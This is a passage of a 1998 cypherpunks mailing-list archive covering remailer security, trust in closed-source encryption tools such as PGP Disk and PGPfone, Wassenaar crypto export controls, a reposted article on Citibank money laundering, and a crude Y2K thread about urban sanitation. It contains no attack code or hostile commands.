Well, the existing remailer net doesn't make "Pretty Good" anonymity very
feasible. I'd think something based on the general idea behind Crowds.

(Furthermore, most remailer structures still can't erase some other security
concerns --
  1: remailers acutally can be hacked or physically compromised
  2: clients really can be screwed
  3: etc.

To help solve the first, you'd want a two-box setup doing remailing, with the
security-critical stuff loaded on a box not directly connected to the Net with
something 140-1ish to make tampering harder, a secure OS, etc. -- or, of
course, you can scrap all that to get really big remailer count.

To help solve the second problem, there needs to be a better web-of-trust 
setup -- that is, one which applies to code as well as keys. Those who wish to
verify code get a .sig-verifying program from a trusted source then use a WoT
to authenticate various facets of the program necessary for security.

A solution to the third problem is expected RSN.)

> 
> 6. Don't send anything that can have grave consequences.

Remember the consequences to an adversary who uses its secret decoder ring,
though: the more plausible it becomes that a certain source is being used for
intelligence-gathering, the more likely it is that that source will promptly
begin to run dry as the spied-upon realize that Something Got Broke.  My
advice, however, agrees with that of the other Anonymous. That is, unless
you've really thought things out, think of an remailed message as merely
.sigless, not anonymous.

> 
> 7. Take names. Always take names. Some day...
> 
> FUDBusterMonger
> 
> It Ain't FUD til I SAY it's FUD!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 5 Dec 1998 10:26:14 +0800
To: cypherpunks@Algebra.COM
Subject: PGP Disk
Message-ID: <199812050205.DAA19561@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>Has anyone had the chance to try out the new McAfee PGP disk?
>It seems pretty straightforward, allowing for the creation of
>encrypted "drives" using the CAST algorithm.  Is anyone aware of
>any security flaws with it?

I'm sure somebody will check if they are bored some day. Where can we find
the source code?

If the source code isn't available, don't trust it. That's a good general
rule.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 5 Dec 1998 13:14:50 +0800
To: cypherpunks@cyberpass.net
Subject: the shit hitting the fan
Message-ID: <199812050500.GAA01545@replay.com>
MIME-Version: 1.0
Content-Type: text/plain





At 02:48 PM 12/4/98 -0600, Igor Chudov @ home wrote:
>Even flushing toilets is not necessary as anyone can shit outside.
>
>I am speaking out of personal experiences, living with water outages
>while we were in the Russian countryside. It was no big deal, period.

Moron.  At a low population density you can do anything, burn wood, leaded
gas,
etc., no problem.

LA has 1e7 people who shit about a kilo per day.  Compute the volume of that
after a week.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 5 Dec 1998 13:22:47 +0800
To: Anonymous <cypherpunks@Algebra.COM
Subject: pgp disk
Message-ID: <199812050508.GAA02103@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 03:05 AM 12/5/98 +0100, Anonymous wrote about some new product:
>If the source code isn't available, don't trust it. That's a good general
>rule.


Where is the source for pgpfone?








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Sat, 5 Dec 1998 06:37:04 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <dfd476d9014bc72c768a44ee77dfe68d@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



   
 
  
  
Citibank in drug cash probe 
GAO report slams bank for secretly moving millions in alleged drug money 

December 4, 1998: 10:56 a.m. ET

http://cnnfn.com/worldbiz/9812/04/citibank/

 

 

Citigroup's Dimon resigns - Nov. 02, 1998 

Citibank Buys Into Microsoft-Supported E-Billing Venture - Sep. 14, 1998 


 

General Accounting Office 

Citibank 
  NEW YORK (CNNfn) - Citibank secretly transferred up to $100 million in alleged drug money for the brother of the former Mexican president and violated its own internal controls on money laundering, the General Accounting Office said Friday. 
 The GAO charged in a report that the second-largest U.S. bank facilitated "a money-managing system that disguised the origin, destination and beneficial owner of the funds."
 The report, entitled "Raul Salinas, Citibank and Alleged Money Laundering," could lead to congressional hearings against Citibank in the new year. Salinas is the eldest brother of Carlos Salinas de Gortari, who served as Mexican president between 1988 and 1994.
 There have been repeated rumors that Salinas was linked to drug lords. But according to the report, Citibank's private banking unit asked Salinas few questions when approached by him in 1992.
 As a mid-level government employee, Salinas earned less than $200,00 a year. But between 1992 and 1994 he moved more than $90 million through Citibank accounts. Checks worth millions of dollars were taken by hand to Citibank Mexico by Salinas' wife Paulina. The money then was moved to Switzerland through a complex series of international transactions.
 Starting in mid-1992, the GAO said, "Citibank actions assisted Mr. Salinas with these transfers and effectively disguised the funds' source and destination, thus breaking the funds' paper trail."
 Citibank has its own "know-your-customer" procedures, which it failed to follow in the Salinas case, the GAO said.
 It was only after Salinas was charged with murder in 1995 that Citibank investigated the source of funds. 
 Even then, according to a bank representative, "Citibank New York's Mexican division believed that all of Mr. Salinas' funds had been obtained legally, with a large portion resulting from the sale of a construction company he owned," the report states. 
 "However, Citibank reportedly knew no details about the construction company, including its name, who had purchased it, or the amount of money generated by its sale."
 GAO investigators also criticize the bank for establishing a Cayman Islands trust to disguise the source and destination of Salinas' money.
 Salinas has denied any wrongdoing, saying that the money came from Mexican industrialists who wanted him to establish an investment fund.
 Citibank said in a statement the report "contains gross errors of fact and interpretation" and "ignores recent progress in strengthened law and industry procedures which Citibank strongly supports in keeping with our commitment to combat money laundering, to comply with the letter and spirit of related laws and to continually strengthen our procedures everywhere we operate."
 Spokesman Dick Howe added, "We have looked into the matter ourselves and have found that neither the company nor any employee has violated the law. We're cooperating fully with law enforcement authorities."
 The GAO said it was unable to determine whether Citibank broke U.S. money laundering laws. But the Justice Department also is investigating the company's actions.
 No law specifically requires banks to know their customers, but money laundering -- concealing the source of funds obtained from illegal activity including drug sales -- is illegal. 
 Salinas is in prison, being tried for murder. 
 Citibank is now part of Citigroup (C) following its merger with Travelers.    

 



 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Sat, 5 Dec 1998 14:41:01 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <199812050240.SAA24692@toad.com>
Message-ID: <Pine.BSF.3.96.981205065847.3124A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 4 Dec 1998, John Gilmore wrote:
 
> We will have to fight this one in the trenches, in each country.
> First step is to raise a hue and cry and put each government on the
> defensive (as they well ought to be).

Ultimately, It won't make a difference, but sure, why not. Crypto regs can
go one way, and one way only: more restrictive. See some 5 years of my
postings on this topic. Lobbying and litigation can only delay the arrival
of a total ban on general purpose strong crypto, not prevent it. Note that
I am not at all claiming that either lobbying or litigation is useless. By
all means, keep it up. It just won't change the fact that the ratchet
turns only into one direction. Until the ratchet breaks, but that is
another matter entirely and tends to be acompanied by lots of dead bodies.

>  Then let's find out what "deal"
> they made with the devil.

I doubt we will find out anytime soon. Favors? Blackmail? Most likely
all of the above. But it doesn't matter why the representative of
country A or B voted for export controls. We already know that most, if
not all, governments would fall all over themselves banning crypto
outright were they exposed to some of the traffic this list has seen over
the years.

What does surpise me, however, is why some people (not John) tend act
surprised when the ratchet tightens yet another notch. I can't help but
wonder if they are equally surprised when the sun goes up in the morning
or tide moves in. Weird.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Sat, 5 Dec 1998 14:40:56 +0800
To: Michael Motyka <mmotyka@lsil.com>
Subject: Re: Streams, Voice, and Sensitive Dependence
In-Reply-To: <3668A32C.5954@lsil.com>
Message-ID: <Pine.BSF.3.96.981205071852.3124B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 4 Dec 1998, Michael Motyka wrote:

> 
> > http://www.starium.com
> > 14.4 modem, awsome sound quality, 2048 bit DH, 3DES.
> 
> The web site is pretty sparse. No wonder I couldn't find them before - I
> was looking for "Starion" a while back. I'll call them next week -
> they're practically local. What's the approximate price?

The company used to be called Comsec. http://www.comsec.com/ They've
expanded and are working on the next revision of the product. The old
version was $750 each. The new version will be a lot less expensive. When
you call, ask for Eric Blossom. (831) 333-9393  x12
 
> I have another question for you:
> 
> I thought I was a real whiz kid a few years back when I figured out that
> by using an agreed upon startup key then using a "random" public/private
> key pair generated by the SW, two voice stations could exchange a
> "random" session key. With thumbscrews and the rack you could not get
> the session key. Even the dreaded rubber hose would fail. The startup
> key protected the PK. The ultimate security was as good as the PK
> portion. The conversation was practically pre-shredded.
> 
> I was bummed when I discovered this had already been patented and was
> called EKE.
> 
> Does the Starium phone accomplish this effect?

Starium's current generation phone encryption device, the GSP8191,
performs a 2048 bit DH key exchange to establish a 3DES session key. Each
party then reads out half of the hash. If the hashes match, you know that
you are not subject to an MIM attack. The system has perfect forward
secrecy. Thumb screws will have no effect. :-)


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 5 Dec 1998 21:29:28 +0800
To: cryptography@c2.net
Subject: Re: Netsurfer Digest: Vol. 04, #35
In-Reply-To: <199812050914.BAA23836@mail.zocalo.net>
Message-ID: <v04020a02b28edad15b24@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:14 AM -0500 on 12/5/98, editor-bounce@netsurf.com wrote:


> Secret Netsurfing... for a Fee
>
> You meet such nice people in this job. People like Cyber Promotions, who
>believe the way to a great Web site is not content, originality, or
>design, but an "aggressive marketing campaign every week" - it sells spam.
>For a fee, Cyber Promotions will send out up to 50,000 messages at a time
>through untraceable remailers and silent servers. This delightful
>organization also bring us - as expected, for a fee - Ultimate Anonymity,
>under the guise of the old-style anonymity sites which campaigned to the
>death against censorship and government interference (remember Penet?).
>Anyone with $14 can use this site to post anonymously in newsgroups, send
>unlimited quantities of untraceable e-mail (with attachments), and
>generally pollute the bandwidth. There may be genuine privacy campaigners
>using the site, if they can squeeze in between all the amateur porn
>merchants.... <http://www.ultimate-anonymity.com/>
>http://www.ultimate-anonymity.com/

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Sat, 5 Dec 1998 21:28:46 +0800
To: cypherpunks@cyberpass.net
Subject: [Fwd: y2k/gary north delusions]
Message-ID: <36693EEC.7AA4A808@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain

 

To: Igor Chudov <ichudov@algebra.com>
Subject: Re: y2k/gary north delusions
From: Soren <sorens@workmail.com>
Date: Sat, 05 Dec 1998 08:29:23 -0500
References: <199812042341.RAA18742@manifold.algebra.com>

Igor Chudov @ home wrote:
> 
>  
> Well... The answer is that there is much less washing needed for
> survival than it is needed for day to day civilized American life.
> 
> For instance, I change my shirts every day. If shit hits the fan,
> you can wear a shirt for two weeks. Similar story is with other
> clothes.

This is a good one.  What about the other half of American life (the
uncivilized?). You know, the americans who live in those old
refrigerator cartons? The ones that nobody sees?  I think they get more
than 2 weeks out of their shirts.

The sad fact is that city brats haven't got the faintest idea what
survival is all about  (you mean I have to *walk* to the supermarket?).
It was in the 1890's when Queen Victoria issued an edict that forced all
the english to 'bathe at least once a year'.

Sit back and enjoy the carnival.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michal Hohensee <mah248@nyu.edu>
Date: Sat, 5 Dec 1998 22:12:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k/gary north delusions
In-Reply-To: <199812050047.SAA19462@manifold.algebra.com>
Message-ID: <36694C23.B4CB9509@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home wrote:
> 
> Michal Hohensee wrote:
> >
> >
> > Igor Chudov @ home wrote:
> > >
> > > Petro wrote:
> > > >       Ok, so let's cut that back to what we _need_. First off, we don't
> > > > dump our dish water down the drain, it gets "recycled" to flush the
> > > > toilets.
> > >
> > > get them to shit outside.
> > >
> >
> > Bad bad bad bad bad bad *bad* idea.  This might be ok in the Russian
> > countryside, or any other countryside, but it an *excessively* bad thing
> > in just about any modern city.  If running water fails to run in the
> > cities, and people do as you suggest, and take their business outside,
> > it will not be long before tremendous numbers of people get sick and
> > die.  What with the high concentrations that people live in in most
> > cities, I expect that this'd make the Black Death look like a mild case
> > of the flu.
> 
> Like I said, someone would need to build a latrine. That's all that's
> needed.
> 

Latrines aren't sufficient to the task.  In a city like NYC, latrines
might solve the problem for perhaps a week (assuming that we tear up all
the roads and sidewalks --something which we cannot do in time, even if
we wanted to), but then they'll be full, and there won't be any more
places the latrines can be rotated to.

Then we're back to doing it in the open.  Less concentrated cities might
last a while longer, but not much longer.  There's no getting around it,
we *need* working sewer systems to have modern cities.  Otherwise, the
cities die.

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Sun, 6 Dec 1998 00:22:35 +0800
To: Michal Hohensee <mah248@nyu.edu>
Subject: Re: y2k/gary north delusions
In-Reply-To: <36694C23.B4CB9509@nyu.edu>
Message-ID: <199812051511.KAA001.50@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <36694C23.B4CB9509@nyu.edu>, on 12/05/98 
   at 10:07 AM, Michal Hohensee <mah248@nyu.edu> said:

>Then we're back to doing it in the open.  Less concentrated cities might
>last a while longer, but not much longer.  There's no getting around it,
>we *need* working sewer systems to have modern cities.  Otherwise, the
>cities die.

And you say this as if it is a bad thing.

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sun, 6 Dec 1998 01:08:23 +0800
To: mah248@nyu.edu (Michal Hohensee)
Subject: Re: y2k/gary north delusions
In-Reply-To: <36694C23.B4CB9509@nyu.edu>
Message-ID: <199812051640.KAA04447@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Michal Hohensee wrote:
> Igor Chudov @ home wrote:
> > Michal Hohensee wrote:
> > > Igor Chudov @ home wrote:
> > > > Petro wrote:
> > > > >       Ok, so let's cut that back to what we _need_. First off, we don't
> > > > > dump our dish water down the drain, it gets "recycled" to flush the
> > > > > toilets.
> > > >
> > > > get them to shit outside.
> > > >
> > >
> > > Bad bad bad bad bad bad *bad* idea.  This might be ok in the Russian
> > > countryside, or any other countryside, but it an *excessively* bad thing
> > > in just about any modern city.  If running water fails to run in the
> > > cities, and people do as you suggest, and take their business outside,
> > > it will not be long before tremendous numbers of people get sick and
> > > die.  What with the high concentrations that people live in in most
> > > cities, I expect that this'd make the Black Death look like a mild case
> > > of the flu.
> > 
> > Like I said, someone would need to build a latrine. That's all that's
> > needed.
> > 
> 
> Latrines aren't sufficient to the task.  In a city like NYC, latrines
> might solve the problem for perhaps a week (assuming that we tear up all
> the roads and sidewalks --something which we cannot do in time, even if
> we wanted to), but then they'll be full, and there won't be any more
> places the latrines can be rotated to.

Why, shit is actually pretty compact. usually with latrines, the liquid
filtrates out, and the compressed shit does not take too much space.

If you dig a deep enough hole (2-3 yards) it should last for a long,
long time. I estimate that a human being produces about 1/2 to 1lb
of hard waste per day, some are more full of it, some less. Let's settle
on one lb per day.

Let's see, a hole that is 5 yards wide, 3 yards deep, and, say, 2 yards
wide, is about 30 cubic yards. It could take about 40 tons of hard
compressed waste, that is, 80 thousand man-days of shitting can be
compressed in it.

You definitely need some heavy machinery to dig this kind of hole
(and then you have to build smoe kind of frame over it to prevent people
from falling into it if it collapses), but it is not hard and can even
be done in a catastrophic scenario.

That's a lot!!! Let's see,a high rise building with 50 floors and 10
apartments in each floor, that's about 1200 people. The latrine would
last them what, about sixty days! And then they can dig another one.

> Then we're back to doing it in the open.  Less concentrated cities might
> last a while longer, but not much longer.  There's no getting around it,
> we *need* working sewer systems to have modern cities.  Otherwise, the
> cities die.

Not in the short run. They could survive for a while.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 6 Dec 1998 00:31:18 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: y2k/gary north delusions
In-Reply-To: <199812050047.SAA19462@manifold.algebra.com>
Message-ID: <199812051605.LAA01045@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



The Hudson River on the west side of Manhattan reportedly
has twelve feet of shit on its bottom, and a permit from the US
Corp of Engineers is needed to disturb it for pier construction
and repair -- and to extend the island for yet another criminal
expansion for the public good: next up is another hotshit
Guggenheim satellite museum by Frank Gehry to match his 
Balboa big holer.

Many sewage lines of the West Side still dump raw sewage
into the river while plans for new sewer systems languish for
lack of funding -- the most recent plant on the Hudson cost in 
excess of $1 billion, has a park on top, is an architectural award
winner, and still stinks like Madonna in church. Though less 
than the surrounding nabes from which the gagging aliens
flee to the shit plant deck which is a 100 feet above the
river and offers Titanic like panoramas, that is, far enough above
the river that the night's floaters/skin-bros are overlookable.

Tis true that rivers and oceans are prosperity's sewage treatment
system, as ever, the best recycling system ever confected by nature 
to handle the effluvia of progress, for refreshing water, air and 
importing cheap-labor illegals (now how to stop them fucking
for recreation, their brats siphoning our hard-stole American birthright 
to profit by the globe's suffering, hurray we got Ks of Terrorist Nukes).

Still, environmental terrorism is booming. Cleanup of the National
Security Apparatus will take decades and $ trillions. Health damage
remediation will take many times that. Shit in streets is a puny task in
comparison to those, not even worth planning for -- well, dog shit
is a big headache in Guiliani's disorderly mind.

Yes, NYC as with other large cities are dumps for the rest of the
country. Yes, going to the country makes me gag -- pity the poor 
rubes, how can they bear the lack of civilized rot and stench.
Oh well, it's TCM's evolution in action: only shit-innoculated mutants 
will inhale the sublime Y2K halitosis of the programmers of built-in
breakdown, vainglorious national planners.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Sat, 5 Dec 1998 23:25:41 +0800
To: cyphers <cypherpunks@cyberpass.net>
Subject: Re: y2k/gary north delusions
In-Reply-To: <199812050047.SAA19462@manifold.algebra.com>
Message-ID: <366958DF.FBF816FC@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Michal Hohensee wrote:
> 
> 
> Latrines aren't sufficient to the task.  In a city like NYC, latrines
> might solve the problem for perhaps a week (assuming that we tear up all
> the roads and sidewalks --something which we cannot do in time, even if
> we wanted to), but then they'll be full, and there won't be any more
> places the latrines can be rotated to.


One obvious advantage to living in the penthouse of a highrise.  Of
course, the elevators may not be working. The elevator shaft may make an
effective latrine though.

City people may be up to their eyeballs in sh*t.  This requires the
availability of raw materiel to produce however, which is predicated on
gas pumps working to fuel transportation of foodstuffs into the hive.  I
suppose horses could make a come-back, but then we're back to piles of
sh*t again.

Current waste disposal conventions such as sewers and trash removal
don't actually magically make this stuff disappear.  In NYC it all ends
up in the Atlantic latrine, where it gets picked up by the gulf stream
and ends up being deposited on Florida beaches after a long sea journey.
There are so many plastic bags bearing logos in the sargasso sea, it
looks like it has been sold off to corporate interests for advertizing
purposes.

I went out fishing in this vicinity a few weeks ago and caught 3 sea
birds (released alive) and only one fish.  On thinking it over, it was
obvious why we caught the birds -- there aren't any fish to catch, so
the birds were hungry enough to go for a lure. Colloform counts in the
mid-Atlantic approach that of an unwashed WC.

Its no better on the other coast, in San Francisco there is an annual
paragraph in the Chron, usually buried near the last page, about (yet)
another *accidental* release of 12 million gallons of raw untreated
sewage, into the bay.  Funny how these accidents happen in december
every year.  We really are the society that believes in *out of sight,
out of mind* solutions.

There is an opportunity in this I suppose,  corner the market on
chemical toilets and reverse osmosis water makers in a big city next
year, and you're laughing. Of course your exit strategy should take into
account the possibility of being taken over in the *public good*.

Hong Kong has a good system for dealing with the flush problem.  When
the sewer system was put in (Japanese occupied, WWII period), all
buildings were double plumbed with fresh water for drinking, cooking and
washing, and sea water for flushing.  With the way most city water
tastes now, maybe the existing plumbing could be turned over to
non-potable water distribution for washing + flushing.  Distribution of
drinking water would be as it is in LA today.

That's the fun part, figuring out how it could all be made to work.

Unfortunately it's more likely that the sheeple will cry out for guvmint
intervention to continue the flow of goodies, to which the western world
has become addicted.

IMHO, the military will be brought in to dig the latrines. Hoarders will
be strung up for not redistributing their wealth in approved socialist
style. Rewards will be posted for informing on a neighbor who is (may
be) a hoarder (5% of the take?). Gas will be reclassified as a public
resource for the duration of the emergency. The military will bring in
the K rations, until it becomes obvious that relocating the
citizen-units to resettlement camps on the outskirts is easier to
manage.  Those who control the sources of food production will also be
drafted into this new(er) deal. Anyone left over from this
redistribution, will be classified as a public enemy and fair game.

This is the perfect opportunity for the state to offer more security in
exchange for reduced liberty.

Was it on this list that I saw the posting about the 300 trucks of army
rations a day being stashed in some Oklahoma(?) caves?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vivek Vaidya" <phirebearer@hotmail.com>
Date: Sun, 6 Dec 1998 04:00:05 +0800
To: cypherpunks@toad.com
Subject: RE: What was the quid pro quo for Wassenaar countries?
Message-ID: <19981205193720.25762.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain




>John Gilmore may be right, but remember folks that in Europe we have 
>this thing the Greeks invented called democracy. One of the ideas of 
>democracy is that decisions are not made in secret closed meetings.
Would you really call the EU protocols a democracy? rule by the 
unelected technocrats?  And Europes history of not making decisions in 
secret closed meetings is hardly commendable.  Excepting perhaps the 
swiss.

>The interpretation of the US ambassador appears to be based on the
>assumption that the governmental proceedures of democratic countries 
>are like those of his home country. In fact European governments 
>cannot make law simply by telling the national police force to >arrest 
folk who engage in particular behaviour.
Now my understanding of european law is, of course, limited.  But in 
France wasn't there that case of some rapper been arrested for insulting 
the police?  And in Germany you can strip the constitutional rights of 
citizens who engage in treasonous behaviour ( could this include 
cryptography? if connected with neo-nazis almost certainly right? )

>The system of checks and balances may be described in the US 
>constitution but it is entrenched in the European polity. The UK >does 
not have a national police force precisely to stop Hooverism.
>
>Even directives of the European Commission do not have legal force 
>until the national parliaments enact legislation to implement the 
>directive.
What about those airline accords where the EU took its member states to 
court over cabotage agreements.  I'm sure there are ways to sneak these 
things through.

>One should also remember that the government of the Netherlands has 
agreed
>to control the sale and use of narcotics. If their efforts to control
>cryptography are as dilligent we have nothing to worry about.
>
>In addition under the single European act the entire country of Europe 
is
>one export zone for crypto control purposes. I fail to see that 
stopping
>Brits from exporting crypto to the US changes the equation a great 
deal.
>
>
>There once was an English king called Canute who attempted to 
demonstrate
>to his courtiers that he was fallible and could not order the tide to
>turn. Perhaps Clinton's courtiers need to learn that they suffer the 
same
>limmitation.

I'm afraid that that may not be the point.  The primary objective of the 
arms control laws ( which are the ones being used as references in this 
case ) is to prevent advanced weapons technology from spreading to the 
third world.  Now Europe, America, Japan, and other first world 
countries are all capable of developing high level crypto indiginously.  
The less advanced countries on the earth are forced to import it from 
these countries.  What the passage of this law will do is prevent this 
export ( example:  the Netherlands, as you pointed out has not cracked 
down on its internal narcotics trade.  However it doesn't permit 
exporting narcotics.  Similarly this agreement will probably freeze 
exports of high level crypto by all the signatory countries, in the same 
way that america no longer permits high level crypto exports. )
The end result being the NSA should able to read India and Chinas 
communications without irritations.  

Vivek Vaidya


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@openpgp.net>
Date: Sun, 6 Dec 1998 03:19:51 +0800
To: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Subject: Re: pgp disk
In-Reply-To: <fb4d35c7250a01fc0610606c695e3e20@anonymous>
Message-ID: <Pine.LNX.4.02.9812051155290.30678-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain



On 5 Dec 1998, HyperReal-Anon wrote:
>>>If the source code isn't available, don't trust it. That's a good general
>>>rule.
I dont believe he is saying source is not available because it is.  In
book form, currently getting scanned in europe somehwere where the
Wersaanar(i dont care i misspelt it) was not signed

>>Where is the source for pgpfone?

Try pgpi.com, i believe if anyone has it they would.. maybe mit
>
>Good question. That's why I wouldn't use it either. (I haven't had reason to
>use it, so 'll take Anonymous's word that source isn't available.)
See above, however, Scram disk has been around more, and it's source
is available

>If people want to release software like this, they need a better argument
>for its security than "Trust us, it's secure." 

Agreed, thats why in PGP's case source is released.

>Considering that there is no net loss when developers of such a product
>release source code so that people can look it over and compile it
>themselves, I don't have any reason to trust such software.

Actually in theory there is, people can steal code, use progs without
paying etcetera. (the latter is available through "juarez" though)

>Aren't McAfee and PGP Inc. members of KRAP and promoting Big Brother Inside?
>I've lost track.

McAfee does not exist, neither does PGP Inc, in a merger of those two and
Network General, they formed Network Associates.  Later NetAss purchased
TIS, for their firewall mind you, and they were members of KRAP .  so NAI
was officially brough in.

Max
--   Max Inux <maxinux@openpgp.net>  Hey Christy!!! New Keys per-request
       If crypto is outlawed only outlaws will have crypto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sun, 6 Dec 1998 02:33:17 +0800
To: cypherpunks@cyberpass.net
Subject: Aharonov-Bohm Effect
Message-ID: <199812051815.MAA28244@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Could someone (other than Jim Choate) explain the mechanism behind the
Aharonov-Bohm effect, where a quantum field propagating via two distinct
paths finds its wavefunction phase shifted by the amount of magnetic flux
enclosed, even if it is completely shielded from the magnetic field, and
traverses only regions of space where B=0.

This has apparently been experimentally verified, and is a leading
candidate for reading the state of quantum dots.  

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Sun, 6 Dec 1998 06:04:29 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: What was the quid pro quo for Wassenaar countries?
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B31A@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain





> The end result being the NSA should able to read India and Chinas 
> communications without irritations.  

You think India won't be able to develop strong encryption indigenously?!
You obviously haven't been keeping up with the times. One word...Bangalore.

Despite the export rhetoric, the real and intended affect it to prevent
widespread *domestic* use. By making the market much smaller (domestic)
only, creating FUD, there are less crypto suppliers and much higher costs.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Sun, 6 Dec 1998 04:17:10 +0800
To: Max Inux <maxinux@openpgp.net>
Subject: Re: pgp disk
In-Reply-To: <Pine.LNX.4.02.9812051155290.30678-100000@khercs.chipware.net>
Message-ID: <199812051907.OAA001.57@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <Pine.LNX.4.02.9812051155290.30678-100000@khercs.chipware.net>, on
12/05/98 
   at 11:59 AM, Max Inux <maxinux@openpgp.net> said:

>>>Where is the source for pgpfone?

>Try pgpi.com, i believe if anyone has it they would.. maybe mit

AFAIK the source for PGPfone has never been released. I had wanted to do a
port to the OS/2 platform but was never able to get the source code for
it.

Nautilas has source available but I do not know what platforms it has been
ported to.

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sun, 6 Dec 1998 03:49:28 +0800
To: Soren <cypherpunks@cyberpass.net>
Subject: Re: y2k/gary north delusions
In-Reply-To: <199812050047.SAA19462@manifold.algebra.com>
Message-ID: <199812051926.LAA10339@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:01 AM 12-5-98 -0500, Soren wrote:
>City people may be up to their eyeballs in sh*t.  This requires the
>availability of raw materiel to produce however, which is predicated on
>gas pumps working to fuel transportation of foodstuffs into the hive.  I
>suppose horses could make a come-back, but then we're back to piles of
[y2k latrine analysis snipped]

I note for the record that this latest thread represents a serious and
probably departure in tone from cypherpunkly nose-in-the-air dismissals of
Y2K problems as recently as 6 or 7 months ago.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 6 Dec 1998 04:57:53 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: (eternity) democracy is a bad idea on the net too! (fwd)
Message-ID: <199812052047.OAA31186@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 5 Dec 1998 20:26:51 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: (eternity) democracy is a bad idea on the net too!

> Markus Kuhn wrote:
> > The main research aspect of this project is the joint administration of
> > such distributed archives. For spam protection, you still need people
> > who decide, which files are allowed on the distributed server
> > infrastructure, and which are not. 
> 
> I think a better deciding factor of which files remain and which don't
> is hard, anonymous ecash.  Allow the author, or server to charge for
> storage, and charge for access.  Allow readers to contribute ecash to
